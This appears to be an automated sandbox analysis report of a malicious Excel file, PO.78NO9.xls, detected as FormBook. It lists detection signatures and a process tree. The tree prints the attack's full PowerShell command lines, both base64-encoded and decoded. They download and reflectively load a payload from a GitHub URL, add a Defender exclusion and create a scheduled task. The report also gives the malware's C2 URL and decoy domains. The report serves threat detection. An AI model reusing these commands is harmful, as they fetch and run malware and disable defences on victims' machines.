Edit tour
Windows
Analysis Report
PO.78NO9.xls
Overview
General Information
| Sample name: | PO.78NO9.xls |
| Analysis ID: | 1527625 |
| MD5: | f4d2762d6fc4b70c3c88ab984e74d7cf |
| SHA1: | ce98c26ec0a34cd39337e94afb3d5cc8409bf944 |
| SHA256: | 781b57f2c750077fea3540b45ab5be0a9f1eac03b02d5ebbd89e4558ec130e50 |
| Tags: | xlsuser-abuse_ch |
| Infos: |   |
 | |
Detection
FormBook
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w7x64
EXCEL.EXE (PID: 3524 cmdline: "C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) 
WINWORD.EXE (PID: 3792 cmdline: "C:\Progra m Files\Mi crosoft Of fice\Offic e14\WINWOR D.EXE" -Em bedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5) 
EQNEDT32.EXE (PID: 3168 cmdline: "C:\Progra m Files\Co mmon Files \Microsoft Shared\EQ UATION\EQN EDT32.EXE" -Embeddin g MD5: A87236E214F6D42A65F5DEDAC816AEC8) 
wscript.exe (PID: 3316 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\wegiv enewthings soonsweetn es.vbS" MD5: 979D74799EA6C8B8167869A68DF5204A) 
powershell.exe (PID: 2660 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' SU5WT0tFLW VYcFJFU1NJ T04oICgnYy crJ0YxdXJs ID0gJysnZl gnKydoaHR0 cHM6Ly9yYS crJ3cnKycu Z2l0aHViJy sndXNlcmNv bnRlJysnbn QuY28nKydt L05vJysnRG V0ZScrJ2Mn Kyd0T24vTm 8nKydEZXRl Y3RPbicrJy 9yZWZzL2hl YWRzL21haW 4nKycvRGV0 YWhOJysnb3 RoLVYuJysn dHh0ZicrJ1 gnKydoJysn OyBjRicrJz EnKydiYXMn KydlJysnNj RDb250Jysn ZW50JysnID 0nKycgJysn KE5ldy0nKy dPYmplY3Qg JysnU3lzdC crJ2UnKydt LicrJ04nKy dldC5XZWJD JysnbGknKy dlbicrJ3Qp JysnLkRvd2 5sb2FkU3Ry aW4nKydnKG NGMXVybCk7 JysnIGNGJy snMWJpJysn bicrJ2EnKy dyeUMnKydv bnRlbnQgPS BbU3knKydz dGVtLkMnKy dvbicrJ3Yn KydlJysncn QnKyddJysn OjpGcm8nKy dtQmFzZTY0 U3RyJysnaW 5nKGNGMWJh c2U2NENvJy snbnRlJysn bnQpOyBjRj EnKydhJysn c3NlbWJseS A9IFtSJysn ZWZsZWN0aS crJ29uLkFz cycrJ2VtYm x5JysnXTon Kyc6TG9hZC hjRicrJzFi aW5hcnknKy dDb250ZW50 KTsgJysnWy crJ2RubGli LklPLkhvbW VdOjpWQUko cE5BdCcrJ3 gnKyd0LlJF UkMnKydDUi 8zMzMvODIu MTQuJysnMD QyLjgzLy86 cHR0aHBOQS wgcE4nKydB ZGVzYScrJ3 RpdmFkb3BO QSwgcE5BZG VzYXRpJysn dmFkb3AnKy dOQSwnKycg cE5BZCcrJ2 VzYXRpdmFk b3BOQSwgcE 5BYScrJ3Nw bmV0X3InKy dlZ2Jyb3dz ZXJzcE5BLC BwTkFwJysn TkEnKycscE 5BcCcrJ05B KScpLnJlUG xhQ2UoJ2ZY aCcsW1NUcm luR11bQ2hh cl0zOSkucm VQbGFDZSgo W0NoYXJdOT krW0NoYXJd NzArW0NoYX JdNDkpLFtT VHJpbkddW0 NoYXJdMzYp LnJlUGxhQ2 UoKFtDaGFy XTExMitbQ2 hhcl03OCtb Q2hhcl02NS ksW1NUcmlu R11bQ2hhcl 0zNCkp';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8) - powershell.exe (PID: 1368 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "INVOK E-eXpRESSI ON( ('c'+' F1url = '+ 'fX'+'hhtt ps://ra'+' w'+'.githu b'+'userco nte'+'nt.c o'+'m/No'+ 'Dete'+'c' +'tOn/No'+ 'DetectOn' +'/refs/he ads/main'+ '/DetahN'+ 'oth-V.'+' txtf'+'X'+ 'h'+'; cF' +'1'+'bas' +'e'+'64Co nt'+'ent'+ ' ='+' '+' (New-'+'Ob ject '+'Sy st'+'e'+'m .'+'N'+'et .WebC'+'li '+'en'+'t) '+'.Downlo adStrin'+' g(cF1url); '+' cF'+'1 bi'+'n'+'a '+'ryC'+'o ntent = [S y'+'stem.C '+'on'+'v' +'e'+'rt'+ ']'+'::Fro '+'mBase64 Str'+'ing( cF1base64C o'+'nte'+' nt); cF1'+ 'a'+'ssemb ly = [R'+' eflecti'+' on.Ass'+'e mbly'+']:' +':Load(cF '+'1binary '+'Content ); '+'['+' dnlib.IO.H ome]::VAI( pNAt'+'x'+ 't.RERC'+' CR/333/82. 14.'+'042. 83//:ptthp NA, pN'+'A desa'+'tiv adopNA, pN Adesati'+' vadop'+'NA ,'+' pNAd' +'esativad opNA, pNAa '+'spnet_r '+'egbrows erspNA, pN Ap'+'NA'+' ,pNAp'+'NA )').rePlaC e('fXh',[S TrinG][Cha r]39).rePl aCe(([Char ]99+[Char] 70+[Char]4 9),[STrinG ][Char]36) .rePlaCe(( [Char]112+ [Char]78+[ Char]65),[ STrinG][Ch ar]34))" MD5: EB32C070E658937AA9FA9F3AE629B2B8) 
aspnet_regbrowsers.exe (PID: 2452 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\asp net_regbro wsers.exe" MD5: 04AA198D72229AEED129DC20201BF030) - powershell.exe (PID: 2980 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Add-MpPref erence -Ex clusionPat h "C:\User s\user\App Data\Roami ng\niLILOT .exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8) - schtasks.exe (PID: 3328 cmdline:
"C:\Window s\System32 \schtasks. exe" /Crea te /TN "Up dates\niLI LOT" /XML "C:\Users\ user\AppDa ta\Local\T emp\tmpB50 D.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3) - aspnet_regbrowsers.exe (PID: 3760 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\asp net_regbro wsers.exe" MD5: 04AA198D72229AEED129DC20201BF030) 
explorer.exe (PID: 1244 cmdline: C:\Windows \Explorer. EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
- taskeng.exe (PID: 2416 cmdline:
taskeng.ex e {6F06CFD C-8B46-428 9-9A59-403 AE8C9352A} S-1-5-21- 966771315- 3019405637 -367336477 -1006:user -PC\user:I nteractive :[1] MD5: 65EA57712340C09B1B0C427B4848AE05) - niLILOT.exe (PID: 3724 cmdline:
C:\Users\u ser\AppDat a\Roaming\ niLILOT.ex e MD5: 04AA198D72229AEED129DC20201BF030)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Formbook, Formbo | FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware. |
{"C2 list": ["www.lefeetlab.net/gwdv/"], "decoy": ["boyxlife.cyou", "v9.delivery", "intelliflow.run", "gstech.cloud", "qzbqtu.cyou", "splunk-test.dev", "nasocnite.xyz", "outdooradventuregearhub511.shop", "uptobisone.website", "andyouwannafuck.cloud", "blancslatespeedshop.com", "technical.cash", "highercall.net", "incronizid.dev", "tzx9y.rest", "brakpanbrand.net", "stimna.love", "thefarmerzpizza.info", "full4d.net", "lingerie-16071.bond", "ouc24.buzz", "spanish-classes-13883.bond", "slhub.xyz", "redcampgear.shop", "prefabricated-homes-48151.bond", "senior-dating-73474.bond", "betnirmala.pro", "xdns.dev", "nvpvr.info", "my-tournament.live", "20040523.xyz", "tb4r.net", "papayan.xyz", "longbeibusiness.life", "workweek.world", "besuperclinic.com", "online-dating-68375.bond", "yourdentalcare.shop", "seo7x.digital", "back-pain-treatment-11921.bond", "hme8h3f.shop", "cip138max.site", "bet-flix.live", "lmodt.info", "m-tb-zy.shop", "ylu8g260nq.cyou", "victorygameconsiderations.homes", "accountingcourse06.shop", "blackwavetattoostudio.com", "divineworks.store", "momomooncakes.net", "kemari.click", "3rhis.shop", "familyswim.xyz", "pp557.vip", "3dnu3uix.college", "massage-courses-infinity.sbs", "jandjacres.net", "dental-implants-84866.bond", "mahjowefvvcne.space", "inkalternatif188bet.net", "birthinjurylawyers825880.online", "yycvoc.sbs", "mdnews.tech"]}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen |
| |
| INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_FormBook | Yara detected FormBook | Joe Security | ||
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
| Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| |
| Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
| |
| Click to see the 26 entries | ||||
Exploits |   |
|---|
| Source: | Author: Joe Security: | ||
| Source: | Author: Joe Security: | ||
System Summary | |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||